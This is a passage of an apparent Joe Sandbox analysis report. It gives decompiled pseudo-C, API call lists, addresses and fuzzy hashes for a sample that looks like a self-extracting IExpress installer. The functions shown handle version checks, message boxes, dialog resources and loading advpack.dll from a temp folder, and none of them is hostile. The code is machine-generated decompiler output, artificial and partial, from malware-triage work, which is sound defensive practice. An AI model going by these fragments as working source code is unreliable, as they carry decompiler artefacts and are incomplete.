	_t115 = __ecx;
	_t135 = 0;
	_v432 = __ecx;
	_t138 = 0;
	if(GetVersionExA( &_v416) != 0) {
		_t133 = _v416.dwMajorVersion;
		_t119 = 2;
		_t77 = _v416.dwPlatformId - 1;
		__eflags = _t77;
		if(_t77 == 0) {
			_t119 = 0;
			__eflags = 1;
			 *0x328184 = 1;
			 *0x328180 = 1;
			L13:
			 *0x329a40 = _t119;
			L14:
			__eflags =  *0x328a34 - _t138; // 0x0
			if(__eflags != 0) {
				goto L66;
			}
			__eflags = _t115;
			if(_t115 == 0) {
				goto L66;
			}
			_v428 = _t135;
			__eflags = _t119;
			_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
			_t11 =  &_v420;
			 *_t11 = _v420 & _t138;
			__eflags =  *_t11;
			_v440 = _t115;
			do {
				_v424 = _t135 * 0x18;
				_v436 = E00322A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
				_t91 = E00322A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
				_t123 = _v436;
				_t133 = 0x54d;
				__eflags = _t123;
				if(_t123 < 0) {
					L32:
					__eflags = _v420 - 1;
					if(_v420 == 1) {
						_t138 = 0x54c;
						L36:
						__eflags = _t138;
						if(_t138 != 0) {
							L40:
							__eflags = _t138 - _t133;
							if(_t138 == _t133) {
								L30:
								_v420 = _v420 & 0x00000000;
								_t115 = 0;
								_v436 = _v436 & 0x00000000;
								__eflags = _t138 - _t133;
								_t133 = _v432;
								if(__eflags != 0) {
									_t124 = _v440;
								} else {
									_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
									_v420 =  &_v268;
								}
								__eflags = _t124;
								if(_t124 == 0) {
									_t135 = _v436;
								} else {
									_t99 = _t124[0x30];
									_t135 = _t124[0x34] + 0x84 + _t133;
									__eflags = _t99 & 0x00000001;
									if((_t99 & 0x00000001) == 0) {
										asm("sbb ebx, ebx");
										_t115 =  ~(_t99 & 2) & 0x00000101;
									} else {
										_t115 = 0x104;
									}
								}
								__eflags =  *0x328a38 & 0x00000001;
								if(( *0x328a38 & 0x00000001) != 0) {
									L64:
									_push(0);
									_push(0x30);
									_push(_v420);
									_push("cent");
									goto L65;
								} else {
									__eflags = _t135;
									if(_t135 == 0) {
										goto L64;
									}
									__eflags =  *_t135;
									if( *_t135 == 0) {
										goto L64;
									}
									MessageBeep(0);
									_t94 = E0032681F(_t115);
									__eflags = _t94;
									if(_t94 == 0) {
										L57:
                                                                                                                                                                                                                                            													0x180030 = 0x30;
                                                                                                                                                                                                                                            													L58:
                                                                                                                                                                                                                                            													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                                                            													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                            													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                            														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                            														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            															goto L66;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														__eflags = _t97 - 1;
                                                                                                                                                                                                                                            														L62:
                                                                                                                                                                                                                                            														if(__eflags == 0) {
                                                                                                                                                                                                                                            															_t138 = 0;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L66;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													__eflags = _t97 - 6;
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t98 = E003267C9(_t124, _t124);
                                                                                                                                                                                                                                            												__eflags = _t98;
                                                                                                                                                                                                                                            												if(_t98 == 0) {
                                                                                                                                                                                                                                            													goto L57;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                            										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                            											goto L30;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                            											goto L66;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t135 = 0;
                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                            										goto L44;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                            									_t129 = _v432;
                                                                                                                                                                                                                                            									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                            									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t133 =  &_v268;
                                                                                                                                                                                                                                            									_t104 = E003228E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                            									__eflags = _t104;
                                                                                                                                                                                                                                            									if(_t104 != 0) {
                                                                                                                                                                                                                                            										goto L66;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t135 = _v428;
                                                                                                                                                                                                                                            									_t133 = 0x54d;
                                                                                                                                                                                                                                            									_t138 = 0x54d;
                                                                                                                                                                                                                                            									goto L40;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							if(_t91 > 0) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t123;
                                                                                                                                                                                                                                            							if(_t123 != 0) {
                                                                                                                                                                                                                                            								__eflags = _t91;
                                                                                                                                                                                                                                            								if(_t91 != 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                            								L27:
                                                                                                                                                                                                                                            								if(__eflags <= 0) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								L28:
                                                                                                                                                                                                                                            								__eflags = _t135;
                                                                                                                                                                                                                                            								if(_t135 == 0) {
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t138 = 0x54c;
                                                                                                                                                                                                                                            								goto L30;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t91;
                                                                                                                                                                                                                                            							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                            							if(_t91 != 0) {
                                                                                                                                                                                                                                            								_t131 = _v424;
                                                                                                                                                                                                                                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                            							_t109 = _v424;
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                                            							L33:
                                                                                                                                                                                                                                            							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                            							_v428 = _t135;
                                                                                                                                                                                                                                            							_v420 = _t135;
                                                                                                                                                                                                                                            							__eflags = _t135 - 2;
                                                                                                                                                                                                                                            						} while (_t135 < 2);
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t77 == 1;
                                                                                                                                                                                                                                            					if(_t77 == 1) {
                                                                                                                                                                                                                                            						 *0x329a40 = _t119;
                                                                                                                                                                                                                                            						 *0x328184 = 1;
                                                                                                                                                                                                                                            						 *0x328180 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - 3;
                                                                                                                                                                                                                                            						if(_t133 > 3) {
                                                                                                                                                                                                                                            							__eflags = _t133 - 5;
                                                                                                                                                                                                                                            							if(_t133 < 5) {
                                                                                                                                                                                                                                            								goto L14;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t113 = 3;
                                                                                                                                                                                                                                            							_t119 = _t113;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t119 = 1;
                                                                                                                                                                                                                                            						_t114 = 3;
                                                                                                                                                                                                                                            						 *0x329a40 = 1;
                                                                                                                                                                                                                                            						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                            						if(__eflags < 0) {
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0x328184 = _t135;
                                                                                                                                                                                                                                            							 *0x328180 = _t135;
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                            						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t138 = 0x4ca;
                                                                                                                                                                                                                                            					goto L44;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t138 = 0x4b4;
                                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					_push(_t135);
                                                                                                                                                                                                                                            					L65:
                                                                                                                                                                                                                                            					_t133 = _t138;
                                                                                                                                                                                                                                            					E003244B9(0, _t138);
                                                                                                                                                                                                                                            					L66:
                                                                                                                                                                                                                                            					return E00326CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239c3
                                                                                                                                                                                                                                            0x003239c9
                                                                                                                                                                                                                                            0x003239ce
                                                                                                                                                                                                                                            0x003239d0
                                                                                                                                                                                                                                            0x003239e3
                                                                                                                                                                                                                                            0x003239e5
                                                                                                                                                                                                                                            0x003239e6
                                                                                                                                                                                                                                            0x003239f1
                                                                                                                                                                                                                                            0x003239f7
                                                                                                                                                                                                                                            0x003239fa
                                                                                                                                                                                                                                            0x00323a01
                                                                                                                                                                                                                                            0x00323a04
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323a06
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x00323a0b
                                                                                                                                                                                                                                            0x00323a0b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323a09
                                                                                                                                                                                                                                            0x003239fc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239fc
                                                                                                                                                                                                                                            0x003239d3
                                                                                                                                                                                                                                            0x003239d8
                                                                                                                                                                                                                                            0x003239da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003239dc
                                                                                                                                                                                                                                            0x003239b6
                                                                                                                                                                                                                                            0x00323955
                                                                                                                                                                                                                                            0x0032395b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323961
                                                                                                                                                                                                                                            0x00323963
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323969
                                                                                                                                                                                                                                            0x00323915
                                                                                                                                                                                                                                            0x00323915
                                                                                                                                                                                                                                            0x0032391b
                                                                                                                                                                                                                                            0x0032391f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032392d
                                                                                                                                                                                                                                            0x00323933
                                                                                                                                                                                                                                            0x00323938
                                                                                                                                                                                                                                            0x0032393a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323940
                                                                                                                                                                                                                                            0x00323946
                                                                                                                                                                                                                                            0x0032394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032394b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238f2
                                                                                                                                                                                                                                            0x00323843
                                                                                                                                                                                                                                            0x00323845
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032384b
                                                                                                                                                                                                                                            0x0032384d
                                                                                                                                                                                                                                            0x00323883
                                                                                                                                                                                                                                            0x00323885
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032389a
                                                                                                                                                                                                                                            0x0032389e
                                                                                                                                                                                                                                            0x0032389e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a0
                                                                                                                                                                                                                                            0x003238a0
                                                                                                                                                                                                                                            0x003238a2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238a4
                                                                                                                                                                                                                                            0x0032384f
                                                                                                                                                                                                                                            0x00323851
                                                                                                                                                                                                                                            0x00323857
                                                                                                                                                                                                                                            0x0032386e
                                                                                                                                                                                                                                            0x00323877
                                                                                                                                                                                                                                            0x0032387b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323881
                                                                                                                                                                                                                                            0x00323859
                                                                                                                                                                                                                                            0x0032385c
                                                                                                                                                                                                                                            0x00323862
                                                                                                                                                                                                                                            0x00323866
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323868
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003238f4
                                                                                                                                                                                                                                            0x003238f4
                                                                                                                                                                                                                                            0x003238f5
                                                                                                                                                                                                                                            0x003238fb
                                                                                                                                                                                                                                            0x00323901
                                                                                                                                                                                                                                            0x00323901
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00323723
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 003239C3
                                                                                                                                                                                                                                            • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 003239F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$BeepVersion
                                                                                                                                                                                                                                            • String ID: 3$cent
                                                                                                                                                                                                                                            • API String ID: 2519184315-3438608206
                                                                                                                                                                                                                                            • Opcode ID: 804bac39fda06825ed402a6b055cf84ff268488e32420b2e4d031df9c5a149de
                                                                                                                                                                                                                                            • Instruction ID: ce740d481c11cfb5f04d1e5a62f6a5d2f0e766c228c91a64e5a7b3fba3351121
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804bac39fda06825ed402a6b055cf84ff268488e32420b2e4d031df9c5a149de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1591F371A012349BEB378B18EC81BEA77B5EB45704F1640A9D8899B281DB788F81CF41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                                            			E00326517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x329a3c; // 0x320000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E003244B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t5 =  &_a16; // 0x322ee8
                                                                                                                                                                                                                                            					_t24 =  *_t5;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00320000,000007D6,00000005), ref: 0032652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00320000,00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00326538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00320000,00000000,00000547,003219E0,00000000), ref: 00326557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00322EE8,00000000,003219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00326560
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID: .2
                                                                                                                                                                                                                                            • API String ID: 1214682469-669109296
                                                                                                                                                                                                                                            • Opcode ID: 25fe15f9ffca4af56298fa849be823b2e3ed5ff1a0e14a3bc4ce671ea1c95c05
                                                                                                                                                                                                                                            • Instruction ID: 0e3411b6b0a325104d7519cc2af0fc62c922bffd0faabe9710cc8276ff9b007f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25fe15f9ffca4af56298fa849be823b2e3ed5ff1a0e14a3bc4ce671ea1c95c05
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5012672100A25BBCB225F69AC09DBB7A6CEF8A360F110129FE0093150D7719C1186A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                                            			E00326495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed char _t14;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                                            				CHAR* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t27 = __esi;
                                                                                                                                                                                                                                            				_t18 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				E00321781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				_t26 = "advpack.dll";
                                                                                                                                                                                                                                            				E0032658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                            				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003264DF
                                                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003264F9
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00326502
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                            • API String ID: 438848745-3761280616
                                                                                                                                                                                                                                            • Opcode ID: ebbb49ba366c9886e9c0368fa11e9142bcd18b9f3f6022974e16302b9692f884
                                                                                                                                                                                                                                            • Instruction ID: 243c1bb9b6107dbcb644de1ef56ab676d9b3092eaf3b7bcc652b7895aea438e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebbb49ba366c9886e9c0368fa11e9142bcd18b9f3f6022974e16302b9692f884
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D101F930500118ABD721DB64FC46FEE737CDF65311F500199F585961C0DF70AE86CA51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00324169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E0032468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E0032468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E003244B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003230B4), ref: 00324189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003230B4), ref: 003241E7
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
